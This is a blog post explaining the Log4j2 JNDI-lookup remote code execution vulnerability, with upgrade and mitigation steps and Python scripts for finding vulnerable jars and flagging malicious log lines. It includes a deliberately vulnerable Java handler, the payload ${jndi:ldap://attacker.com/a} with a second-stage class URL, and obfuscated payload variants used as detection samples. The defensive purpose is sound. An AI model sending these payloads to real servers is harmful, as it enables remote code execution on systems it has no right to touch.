I woke up this morning to find that Apache Log4j2, the well-known Java logging component, had exploded: a 0-day vulnerability in Log4j2 lets an attacker achieve Remote Code Execution simply by getting a crafted string written to the log. Because the logging library is so widely used and the vulnerability is so easy to exploit, the risk is serious enough that you have to take precautions. Even customers who don't understand code came to ask whether the system has this problem.

The affected version

The versions affected by the vulnerability are Apache Log4j2 2.0 (from 2.0-beta9) through 2.14.1.

Security version

The official patch version 2.15.0 has been released; upgrade immediately. (2.15.0 was itself later found to be an incomplete fix and has been superseded by further releases, so check the Apache Log4j security page for the current fixed version before you pin one.)

  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId>
      <version>2.15.0</version>
    </dependency>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>2.15.0</version>
    </dependency>
  </dependencies>

Temporary remedy

Not every application can be upgraded to a fixed version in time, so there are also temporary mitigations:

  • Modify the JVM parameters: add -Dlog4j2.formatMsgNoLookups=true.
  • Or add a log4j2.component.properties file to the classpath of the affected project containing the configuration item log4j2.formatMsgNoLookups=true.

Both settings are only honoured by Log4j2 2.10 and later. For older 2.x releases the in-place option is to delete the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from log4j-core.jar so that the jndi: lookup no longer exists.
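As an added example (not code from this post), here is a small Python scanner that walks a directory for jars, reads the log4j-core version from the Maven pom.properties entry, checks whether JndiLookup.class is present, reports which of the two mitigations above applies, and can strip the class in place (the same effect as `zip -q -d` on the jar). The jar it builds for the demo is a constructed stand-in containing only the two entries the scanner reads, not a real log4j-core; the fixed-version threshold of 2.15.0 is taken from this post and is a constant you should raise as later advisories require.

```python
import io
import os
import shutil
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 15, 0)          # fixed release named in this post; bump as later advisories require
NO_LOOKUPS_FLAG_SINCE = (2, 10, 0)  # log4j2.formatMsgNoLookups is ignored by older releases


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a pre-release such as '2.0-beta9' maps to (2, 0, 0) (still < 2.15.0)."""
    parts = [int(p) for p in text.split("-")[0].split(".") if p.isdigit()]
    return tuple((parts + [0, 0, 0])[:3])


def find_jars(root):
    """Yield every *.jar under root (nested jars inside wars/fat jars are not opened here)."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".jar"):
                yield os.path.join(dirpath, name)


def scan_jar(path):
    """Report whether a jar ships a vulnerable log4j-core and which remedy applies."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_lookup = JNDI_LOOKUP_CLASS in names
    vt = parse_version(version) if version else None
    # Lookup class present but version unknown: treat as vulnerable until proven otherwise.
    vulnerable = has_lookup and (vt is None or vt < FIXED_VERSION)
    if not vulnerable:
        remedy = "none"
    elif vt is not None and vt >= NO_LOOKUPS_FLAG_SINCE:
        remedy = "upgrade, or set log4j2.formatMsgNoLookups=true"
    else:
        remedy = "upgrade, or remove JndiLookup.class (formatMsgNoLookups not honoured before 2.10)"
    return {"path": path, "version": version, "has_jndi_lookup": has_lookup,
            "vulnerable": vulnerable, "remedy": remedy}


def strip_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class (same effect as `zip -q -d`). Returns True if removed."""
    with zipfile.ZipFile(path) as src:
        if JNDI_LOOKUP_CLASS not in src.namelist():
            return False
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_LOOKUP_CLASS:
                    dst.writestr(info, src.read(info.filename))
    with open(path, "wb") as fh:
        fh.write(buf.getvalue())
    return True


def build_sample_jar(path, version):
    """Constructed stand-in for log4j-core-<version>.jar holding only the two entries scanned above."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                    "artifactId=log4j-core\nversion=%s\n" % version)
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode


def demo():
    """Build a constructed 2.14.1 jar in a temp dir, scan it, strip the class, rescan; return the reports."""
    workdir = tempfile.mkdtemp()
    try:
        jar = os.path.join(workdir, "lib", "log4j-core-2.14.1.jar")
        os.makedirs(os.path.dirname(jar))
        build_sample_jar(jar, "2.14.1")
        found = list(find_jars(workdir))
        before = scan_jar(jar)
        removed = strip_jndi_lookup(jar)
        after = scan_jar(jar)
        return {"found": len(found), "before": before, "removed": removed, "after": after}
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Point find_jars at a deployment directory and call scan_jar on each result; only strip a jar after taking a backup, and remember that shaded or nested jars (log4j-core repackaged inside a war, ear or fat jar) are not opened by this walker and need the same check applied to their contents.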

Attack principle

 import com.sun.net.httpserver.HttpExchange;
 import com.sun.net.httpserver.HttpHandler;
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;

 import java.io.IOException;
 import java.io.OutputStream;
 import java.nio.charset.StandardCharsets;

 public class VulnerableLog4jExampleHandler implements HttpHandler {

   // Log4j2 API logger (org.apache.logging.log4j), which is the component with the lookup bug
   static final Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class);

   /**
    * A simple HTTP endpoint that reads the request's User-Agent and logs it back.
    * Deliberately left vulnerable to illustrate the issue; not a full application.
    * @param he HTTP request/response exchange
    */
   public void handle(HttpExchange he) throws IOException {
     String userAgent = he.getRequestHeaders().getFirst("User-Agent");

     // This line triggers the RCE by logging the attacker-controlled HTTP User-Agent header.
     // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
     log.info("Request User Agent: " + userAgent);

     byte[] body = ("<h1>Hello There, " + userAgent + "!</h1>").getBytes(StandardCharsets.UTF_8);
     he.sendResponseHeaders(200, body.length);
     try (OutputStream os = he.getResponseBody()) {
       os.write(body);
     }
   }
 }

In the code above, Log4j2 does not log the User-Agent string literally: the pattern layout resolves ${...} lookups inside the message, and the jndi: lookup makes the server perform a JNDI lookup against whatever LDAP server the attacker named. That server can answer with a reference to a remote class, which the server then loads and executes, so the attacker gets code execution just by sending a header.

Attack steps

  • The attacker sends a request to the vulnerable server.
  • The server, through Log4j2, logs the JNDI/LDAP payload contained in the request, ${jndi:ldap://attacker.com/a}, where attacker.com is an address controlled by the attacker.
  • As the logged payload is formatted, the lookup is triggered and the server issues a JNDI request to attacker.com.
  • attacker.com can answer with a reference to malicious executable content that is loaded into the server process, such as the bytecode at http://second-stage.attacker.com/Exploit.class.
  • The attacker's code runs on the server.
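To make the first two steps concrete, here is an added Python example (not code from this post or from Log4j) that models the inside-out ${...} substitution Log4j2 applies to a logged message and records, instead of performing, every jndi: lookup it would reach. It is a simplified model of the substitutor, supporting only the lower/upper lookups and the ${key:-default} fallback syntax, which is enough to show why a literal check for the string ${jndi: misses the obfuscated payloads seen in the wild and why formatMsgNoLookups stops all of them. The log lines are constructed samples, and attacker.com is the placeholder host from the steps above.

```python
import re

# Innermost ${...} (a body with no nested braces). Log4j's substitutor resolves inside-out,
# which is what lets "${${lower:j}ndi:...}" turn back into "${jndi:...}" before it is acted on.
LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")


def resolve_body(body, jndi_calls):
    """Resolve one lookup body. Returns the replacement text, or None if it cannot be resolved.

    Simplified model of Log4j2 lookup semantics (not the real implementation):
      ${lower:X} / ${upper:X}   -> case-mapped X
      ${key:-default}           -> default when key cannot be resolved (e.g. ${::-j}, ${env:NOTHING:-j})
      ${jndi:URL}               -> recorded here; real Log4j would contact URL at this point
    """
    key, sep, default = body.partition(":-")
    prefix, _, arg = key.partition(":")
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "jndi":
        jndi_calls.append(arg)
        return "<jndi:%s>" % arg
    return default if sep else None


def resolve(message, jndi_calls, format_msg_no_lookups=False):
    """Expand lookups in a log message the way the layout would, collecting the JNDI targets.

    With log4j2.formatMsgNoLookups=true the message text is emitted exactly as written.
    """
    if format_msg_no_lookups:
        return message
    while True:
        progress = False

        def repl(match):
            nonlocal progress
            out = resolve_body(match.group(1), jndi_calls)
            if out is None:
                return match.group(0)  # unresolvable lookup stays in the output, as in Log4j
            progress = True
            return out

        message = LOOKUP_RE.sub(repl, message)
        if not progress:
            return message


def find_jndi_lookups(line, format_msg_no_lookups=False):
    """JNDI URLs that logging this line would resolve (empty list when the line is safe to log)."""
    calls = []
    resolve(line, calls, format_msg_no_lookups)
    return calls


def scan_lines(lines):
    """(index, urls) for every line that would trigger a JNDI lookup when logged."""
    hits = []
    for i, line in enumerate(lines):
        urls = find_jndi_lookups(line)
        if urls:
            hits.append((i, urls))
    return hits


def naive_scan(lines):
    """What a literal substring check catches: only the unobfuscated payload."""
    return [i for i, line in enumerate(lines) if "${jndi:" in line]


# Constructed access-log lines (not real traffic): one benign, one plain payload, three obfuscated.
SAMPLE_LINES = [
    'GET / "Mozilla/5.0"',
    'GET / "${jndi:ldap://attacker.com/a}"',
    'GET / "${${lower:j}ndi:${lower:l}dap://attacker.com/a}"',
    'GET / "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.com/a}"',
    'GET / "${${env:NOTHING:-j}ndi:rmi://attacker.com/a}"',
]


if __name__ == "__main__":
    print("substring check flags:", naive_scan(SAMPLE_LINES))
    print("lookup model flags:   ", scan_lines(SAMPLE_LINES))
```

Run over the samples, the substring check flags only line 1, while the lookup model flags lines 1 through 4 and names the LDAP/RMI target each would contact; the same five lines produce no hits when format_msg_no_lookups is set, which is the mitigation from the section above. For real detection, run the model over the raw header values your edge logs, since the payload is resolved by the application's logger, not by the web server that received it.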

Don’t take this loophole lightly

Because Log4j2 is so widely used, a great many applications are affected.

Even the PaperMC server for Minecraft was not spared. So go ahead and patch it.

Personal blog: felord.cn